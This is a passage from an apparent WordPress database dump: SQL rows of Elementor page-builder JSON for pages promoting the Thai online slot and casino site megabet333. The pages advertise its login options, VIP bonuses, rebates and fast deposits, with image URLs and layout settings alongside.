\\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1042,134,'_thumbnail_id','60'),(1043,134,'_elementor_edit_mode','builder'),(1044,134,'_elementor_template_type','wp-page'),(1045,134,'_elementor_version','3.32.5'),(1046,134,'_elementor_pro_version','3.32.3'),(1047,134,'_wp_page_template','default'),(1048,134,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1049,134,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1052,135,'_thumbnail_id','60'),(1053,135,'_elementor_edit_mode','builder'),(1054,135,'_elementor_template_type','wp-page'),(1055,135,'_elementor_version','3.32.5'),(1056,135,'_elementor_pro_version','3.32.3'),(1057,135,'_wp_page_template','default'),(1058,135,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1059,135,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP 